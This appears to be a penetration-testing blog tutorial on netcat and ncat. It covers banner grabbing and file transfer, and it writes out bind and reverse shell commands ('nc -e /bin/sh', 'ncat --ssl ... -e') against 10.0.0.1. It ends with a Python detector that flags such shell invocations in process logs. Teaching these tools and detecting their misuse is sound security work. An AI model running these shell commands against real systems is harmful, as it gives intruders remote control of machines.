October 29, 2019 · Basic Pen-Testing

# Essential Tools - netcat & ncat (Part I)

## Netcat

- Can connect to both TCP and UDP ports
- Read service banners
- Connect to a service manually
### Basic Usage

Connect to POP3, suppress name/port resolution, and show all verbose responses:

```sh
nc -nv 10.0.0.1 110   # -n skip DNS/service-name lookups, -v verbose
```

Listen at localhost:4444 as server:

```sh
nc -lnvp 4444   # -l listen, -p port
# the macOS version does not need the -p flag
nc -lnv 4444
```

Connect to 10.0.0.1:4444 as client:

```sh
nc -nv 10.0.0.1 4444
```
### Transfer Files

Listen at localhost:4444 as server and redirect everything received into a file:

```sh
nc -lnvp 4444 > output
```

Connect to 10.0.0.1:4444 and feed a local file (here also named `output`) to the connection on stdin; the listening side writes it to its own `output`:

```sh
nc -nv 10.0.0.1 4444 < output
```
### Listen as shell

Listen at localhost:4444 as server and serve a shell (a bind shell):

```sh
nc -nlvp 4444 -e cmd.exe   # windows
nc -nlvp 4444 -e /bin/sh   # linux
```

Note that `-e` exists only in some netcat builds (netcat-traditional, ncat); the OpenBSD netcat shipped on many systems does not have it.

Connect as client:

```sh
nc -nv 10.0.0.1 4444
# ls -la on linux, for example, lists the directory
# dir on windows, for example, lists the directory
```
### Reverse shell

Listen at localhost:4444 as server:

```sh
nc -lnvp 4444   # -l listen, -p port
# the macOS version does not need the -p flag
nc -lnv 4444
```

Connect to 10.0.0.1:4444 as client:

```sh
nc -nv 10.0.0.1 4444 -e /bin/sh   # -e on the client side hands the shell's input and output to the connection
```
## Ncat

- An improved version of netcat with encryption/decryption features
- Pretty much the same usage, but more secure with the `--ssl` flag, plus more security-related features

Ncat is not a pre-installed package on Kali or macOS; install it with `apt-get install ncat` or `brew install ncat` before continuing.
### Listen as shell

Listen at localhost:4444 as server and serve a shell over TLS:

```sh
ncat --ssl -vnlp 4444 -e /bin/sh
```

Connect as client:

```sh
ncat -v 10.0.0.1 4444 --ssl
# ls -la on linux, for example, lists the directory
# dir on windows, for example, lists the directory
```

`--ssl` encrypts the session but on its own does not authenticate the other end: by default ncat generates a temporary self-signed certificate, and the client accepts any certificate unless `--ssl-verify` is used.
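From the defender's side, the bind and reverse shells above (nc with `-e`, ncat with `--ssl ... -e`) are recognisable in process telemetry by their flags alone. The following Python is an added example, not part of the original post: it parses a netcat/ncat command line the way the flags are written on this page (clustered short options such as `-lnvp` and `-vnlp`) and labels the role. The binary names, the set of argument-taking options, and the sample command lines are my own assumptions.

```python
import shlex

NETCAT_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
TAKES_ARG = set("peswi")  # short options that consume the next token (assumed set)
EXEC_LONG = {"--exec", "--sh-exec"}  # ncat long forms of -e (space-separated form only)


def classify_netcat(cmdline):
    """Parse one process command line; returns None if it is not netcat/ncat."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_BINARIES:
        return None
    listen = exec_ = ssl = False
    program, i = None, 1
    while i < len(argv):
        tok = argv[i]
        if tok == "--ssl":
            ssl = True
        elif tok in EXEC_LONG:
            exec_, i = True, i + 1
            program = argv[i] if i < len(argv) else None
        elif tok.startswith("-") and not tok.startswith("--") and len(tok) > 1:
            for ch in tok[1:]:  # clustered flags such as -lnvp or -vnlp
                if ch == "l":
                    listen = True
                if ch in TAKES_ARG:  # an option with an argument ends the cluster
                    i += 1
                    if ch == "e":
                        exec_ = True
                        program = argv[i] if i < len(argv) else None
                    break
        i += 1
    if exec_:
        role = "bind_shell" if listen else "reverse_shell"
    else:
        role = "listener" if listen else "client"
    return {"binary": argv[0], "role": role, "ssl": ssl, "program": program}


def flag_shell_invocations(cmdlines):
    """Keep only command lines that hand a program's stdio to the socket."""
    verdicts = (classify_netcat(line) for line in cmdlines)
    return [v for v in verdicts if v and v["role"].endswith("_shell")]


# Constructed sample of process command lines: the page's commands plus benign noise.
SAMPLE_CMDLINES = ["nc -nv 10.0.0.1 110", "nc -lnvp 4444 -e cmd.exe", "/usr/sbin/sshd -D",
                   "nc -nv 10.0.0.1 4444 -e /bin/sh", "ncat --ssl -vnlp 4444 -e /bin/sh"]
```

Feed it the command-line column of your EDR or `ps -eo args` export; a `-e` on a listener is a bind shell, a `-e` on a connecting client is a reverse shell, and `ssl` tells you the content will not be visible to network inspection.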